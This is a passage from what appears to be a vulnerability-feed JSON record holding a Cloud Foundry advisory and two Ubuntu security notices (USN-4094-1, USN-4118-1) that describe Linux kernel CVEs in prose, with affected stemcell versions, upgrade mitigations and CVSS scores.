Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n\n## Description\n\nIt was discovered that the alarmtimer implementation in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux kernel did not properly track inode validations. An attacker could use this to construct a malicious XFS image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious f2fs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616, CVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation in the Linux kernel did not properly validate metadata. An attacker could use this to construct a malicious btrfs image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux kernel did not properly handle malformed catalog data in some situations. An attacker could use this to construct a malicious HFS+ image that, when mounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem of the Linux kernel did not properly initialize new files in some situations. A local attacker could use this to expose sensitive information. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux kernel did not properly handle size checks when handling an extra USB descriptor. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in the Linux kernel did not properly validate elliptic curve parameters during Diffie-Hellman key exchange in some situations. An attacker could use this to expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors incorrectly handle SWAPGS instructions during speculative execution. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed in the Near-field communication (NFC) implementation in the Linux kernel. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel improperly dropped a device reference in an error condition, leading to a use-after-free. An attacker could use this to cause a denial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in the Near-field communication (NFC) implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel when accessing LDT entries in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did not properly record credentials in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver implementation in the Linux kernel contained a use-after-free vulnerability when disconnecting the device. An attacker could use this to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the Linux kernel did not properly validate control bits, resulting in an out of bounds buffer read. A local attacker could use this to possibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux kernel did not properly prevent kernel addresses from being copied to user space. A local attacker with the CAP_NET_ADMIN capability could use this to expose sensitive information. (CVE-2018-20511)\n\nCVEs contained in this USN include: CVE-2018-13053, CVE-2018-13096, CVE-2018-14609, CVE-2018-14617, CVE-2018-16862, CVE-2018-20169, CVE-2018-13097, CVE-2018-13099, CVE-2018-13100, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613, CVE-2018-14614, CVE-2018-14616, CVE-2018-13093, CVE-2018-13098, CVE-2018-14615, CVE-2018-20511, CVE-2018-5383, CVE-2019-10126, CVE-2019-1125, CVE-2019-12614, CVE-2019-3846, CVE-2019-13272, CVE-2018-20856, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13233, CVE-2019-2024, CVE-2019-2101\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 456.x versions prior to 456.14\n * 315.x versions prior to 315.83\n * 250.x versions prior to 250.95\n * 170.x versions prior to 170.120\n * 97.x versions prior to 97.145\n * All other stemcells not listed.\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 456.x versions to 456.14\n * Upgrade 315.x versions to 315.83\n * Upgrade 250.x versions to 250.95\n * Upgrade 170.x versions to 170.120\n * Upgrade 97.x versions to 97.145\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n## References\n\n * [USN-4094-1](<https://usn.ubuntu.com/4094-1>)\n * [CVE-2018-13053](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13053>)\n * [CVE-2018-13096](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13096>)\n * [CVE-2018-14609](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14609>)\n * [CVE-2018-14617](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14617>)\n * [CVE-2018-16862](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16862>)\n * [CVE-2018-20169](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-20169>)\n * [CVE-2018-13097](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13097>)\n * [CVE-2018-13099](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13099>)\n * [CVE-2018-13100](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-13100>)\n * [CVE-2018-14610](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14610>)\n * [CVE-2018-14611](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14611>)\n * [CVE-2018-14612](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14612>)\n * [CVE-2018-14613](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14613>)\n * [CVE-2018-14614](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14614>)\n * [CVE-2018-14616](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14616>)\n * [CVE-2018-13093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13093>)\n * [CVE-2018-13098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13098>)\n * [CVE-2018-14615](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14615>)\n * [CVE-2018-20511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20511>)\n * [CVE-2018-5383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5383>)\n * [CVE-2019-10126](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-10126>)\n * [CVE-2019-1125](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-1125>)\n * [CVE-2019-12614](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12614>)\n * [CVE-2019-3846](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-3846>)\n * [CVE-2019-13272](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13272>)\n * [CVE-2018-20856](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-20856>)\n * [CVE-2019-12818](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12818>)\n * [CVE-2019-12819](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12819>)\n * [CVE-2019-12984](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12984>)\n * [CVE-2019-13233](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13233>)\n * [CVE-2019-2024](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-2024>)\n * [CVE-2019-2101](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-2101>)\n", "edition": 1, "modified": "2019-09-30T00:00:00", "published": "2019-09-30T00:00:00", "id": "CFOUNDRY:40058483A2E2195544934D494FF464F7", "href": "https://www.cloudfoundry.org/blog/usn-4094-1/", "title": "USN-4094-1: Linux kernel vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:43:06", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14609", "CVE-2019-14763", "CVE-2019-15218", "CVE-2018-13053", "CVE-2019-15090", "CVE-2019-3900", "CVE-2018-14610", "CVE-2018-13096", "CVE-2019-0136", "CVE-2018-13098", "CVE-2019-14284", "CVE-2019-12984", "CVE-2019-10639", "CVE-2018-20784", "CVE-2019-15216", "CVE-2018-13100", "CVE-2019-15211", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2019-11085", "CVE-2018-13099", "CVE-2019-13272", "CVE-2019-9506", "CVE-2019-15215", "CVE-2019-13631", "CVE-2018-16862", "CVE-2019-11884", "CVE-2019-10207", "CVE-2019-15220", "CVE-2019-11810", "CVE-2019-11833", "CVE-2019-15212", "CVE-2019-11599", "CVE-2019-15221", "CVE-2018-14614", "CVE-2019-10638", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2019-3701", "CVE-2019-15292", "CVE-2019-11487", "CVE-2018-14612", "CVE-2019-2024", "CVE-2019-11815", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-15214", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-3819", "CVE-2018-19985", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613", "CVE-2019-14283"], "description": "It was discovered that the alarmtimer implementation in the Linux kernel \ncontained an integer overflow vulnerability. A local attacker could use \nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux \nkernel did not properly validate metadata. An attacker could use this to \nconstruct a malicious f2fs image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13096, CVE-2018-13097, CVE-2018-13098, \nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14615, \nCVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation \nin the Linux kernel did not properly validate metadata. An attacker could \nuse this to construct a malicious btrfs image that, when mounted, could \ncause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610, \nCVE-2018-14611, CVE-2018-14612, CVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux \nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when \nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem \nof the Linux kernel did not properly initialize new files in some \nsituations. A local attacker could use this to expose sensitive \ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed driver \nin the Linux kernel did not properly validate metadata received from the \ndevice. A physically proximate attacker could use this to cause a denial of \nservice (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux \nkernel did not properly handle size checks when handling an extra USB \ndescriptor. A physically proximate attacker could use this to cause a \ndenial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could be triggered in the CFS \nLinux kernel process scheduler. A local attacker could possibly use this to \ncause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block layer \nsubsystem of the Linux kernel when certain failure conditions occurred. A \nlocal attacker could possibly use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in \nthe Linux kernel did not properly validate elliptic curve parameters during \nDiffie-Hellman key exchange in some situations. An attacker could use this \nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel did \nnot properly validate certain Tunneled Direct Link Setup (TDLS). A \nphysically proximate attacker could use this to cause a denial of service \n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell \nWireless LAN device driver for the Linux kernel. An attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux \nkernel did not properly check for missing tty operations. A local attacker \ncould use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not \nsufficiently randomize IP ID values generated for connectionless networking \nprotocols. A remote attacker could use this to track particular Linux \ndevices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel \naddresses could be exposed by the implementation of connection-less network \nprotocols in the Linux kernel. A remote attacker could possibly use this to \nassist in the exploitation of another vulnerability in the Linux kernel. \n(CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics driver in \nthe Linux kernel did not properly restrict mmap() ranges in some \nsituations. A local attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel when \nreference counting pages, leading to potential use-after-free issues. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel when \nperforming core dumps. A local attacker could use this to cause a denial of \nservice (system crash) or expose sensitive information. (CVE-2019-11599)\n\nIt was discovered that a null pointer dereference vulnerability existed in \nthe LSI Logic MegaRAID driver in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free existed \nin the Reliable Datagram Sockets (RDS) protocol implementation in the Linux \nkernel. The RDS protocol is blacklisted by default in Ubuntu. If enabled, a \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the Linux \nkernel did not properly zero out memory in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol (HIDP) \nimplementation in the Linux kernel did not properly verify strings were \nNULL terminated in certain situations. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. An \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel \nimproperly dropped a device reference in an error condition, leading to a \nuse-after-free. An attacker could use this to cause a denial of service \n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel \nwhen accessing LDT entries in some situations. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did \nnot properly record credentials in some situations. A local attacker could \nuse this to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux kernel did \nnot properly bounds check the initial HID report sent by the device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not \nproperly validate meta data, leading to a buffer overread. A local attacker \ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not \nproperly validate ioctl() calls, leading to a division-by-zero. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare USB3 \nDRD Controller device driver in the Linux kernel. A physically proximate \nattacker could use this to cause a denial of service. (CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic QEDI \niSCSI Initiator Driver in the Linux kernel. A local attacker could possibly \nuse this to expose sensitive information (kernel memory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in the \nLinux kernel did not properly allocate memory, leading to a use-after-free. \nA physically proximate attacker could use this to cause a denial of service \nor possibly execute arbitrary code. (CVE-2019-15211)\n\nIt was discovered at a double-free error existed in the USB Rio 500 device \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux Sound \nArchitecture (ALSA) subsystem of the Linux kernel, leading to a potential \nuse-after-free. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2 video4linux \ndevice driver for the Linux kernel, leading to a use-after-free. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB Prism54 \ndevice driver in the Linux kernel. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the \nAppleTalk implementation in the Linux kernel if an error occurs during \ninitialization. A local attacker could use this to cause a denial of \nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver \nimplementation in the Linux kernel contained a use-after-free vulnerability \nwhen disconnecting the device. An attacker could use this to cause a denial \nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the \nLinux kernel did not properly validate control bits, resulting in an out of \nbounds buffer read. A local attacker could use this to possibly expose \nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux \nkernel did not properly validate the BSS descriptor. A local attacker could \npossibly use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in the \nvirtio net driver in the Linux kernel. A local attacker in a guest VM could \npossibly use this to cause a denial of service in the host system. \n(CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen discovered \nthat the Bluetooth protocol BR/EDR specification did not properly require \nsufficiently strong encryption key lengths. A physically proximate attacker \ncould use this to expose sensitive information. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux \nkernel did not properly prevent kernel addresses from being copied to user \nspace. A local attacker with the CAP_NET_ADMIN capability could use this to \nexpose sensitive information. (CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX device \ndriver in the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in the \nLinux kernel made improper assumptions about the device characteristics. A \nphysically proximate attacker could use this cause a denial of service \n(system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux kernel \ndid not properly validate data size information from the device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in some \nsituations did not properly restrict the field size when processing \noutgoing frames. A local attacker with CAP_NET_ADMIN privileges could use \nthis to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux kernel's \nHID subsystem did not properly validate passed parameters in some \nsituations. A local privileged attacker could use this to cause a denial of \nservice (infinite loop). (CVE-2019-3819)", "edition": 3, "modified": "2019-09-02T00:00:00", "published": "2019-09-02T00:00:00", "id": "USN-4118-1", "href": "https://ubuntu.com/security/notices/USN-4118-1", "title": "Linux kernel (AWS) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:00", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "description": "It was discovered that the alarmtimer implementation in the Linux kernel \ncontained an integer overflow vulnerability. A local attacker could use \nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux \nkernel did not properly track inode validations. An attacker could use this \nto construct a malicious XFS image that, when mounted, could cause a denial \nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the \nLinux kernel did not properly validate metadata. An attacker could \nuse this to construct a malicious f2fs image that, when mounted, \ncould cause a denial of service (system crash). (CVE-2018-13097, \nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616, \nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system \nimplementation in the Linux kernel did not properly validate \nmetadata. An attacker could use this to construct a malicious \nbtrfs image that, when mounted, could cause a denial of service \n(system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, \nCVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux \nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when \nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem \nof the Linux kernel did not properly initialize new files in some \nsituations. A local attacker could use this to expose sensitive \ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux \nkernel did not properly handle size checks when handling an extra USB \ndescriptor. A physically proximate attacker could use this to cause a \ndenial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer \nsubsystem of the Linux kernel when certain failure conditions occurred. A \nlocal attacker could possibly use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in \nthe Linux kernel did not properly validate elliptic curve parameters during \nDiffie-Hellman key exchange in some situations. An attacker could use this \nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell \nWireless LAN device driver for the Linux kernel. An attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors \nincorrectly handle SWAPGS instructions during speculative execution. A \nlocal attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel \ndid not properly check for allocation errors in some situations. A local \nattacker could possibly use this to cause a denial of service (system \ncrash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. An \nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel \nimproperly dropped a device reference in an error condition, leading to a \nuse-after-free. An attacker could use this to cause a denial of service \n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in \nthe Near-field communication (NFC) implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel \nwhen accessing LDT entries in some situations. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did \nnot properly record credentials in some situations. A local attacker could \nuse this to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver \nimplementation in the Linux kernel contained a use-after-free vulnerability \nwhen disconnecting the device. An attacker could use this to cause a denial \nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the \nLinux kernel did not properly validate control bits, resulting in an out of \nbounds buffer read. A local attacker could use this to possibly expose \nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux \nkernel did not properly validate the BSS descriptor. A local attacker could \npossibly use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux \nkernel did not properly prevent kernel addresses from being copied to user \nspace. A local attacker with the CAP_NET_ADMIN capability could use this to \nexpose sensitive information. (CVE-2018-20511)", "edition": 2, "modified": "2019-08-13T00:00:00", "published": "2019-08-13T00:00:00", "id": "USN-4094-1", "href": "https://ubuntu.com/security/notices/USN-4094-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}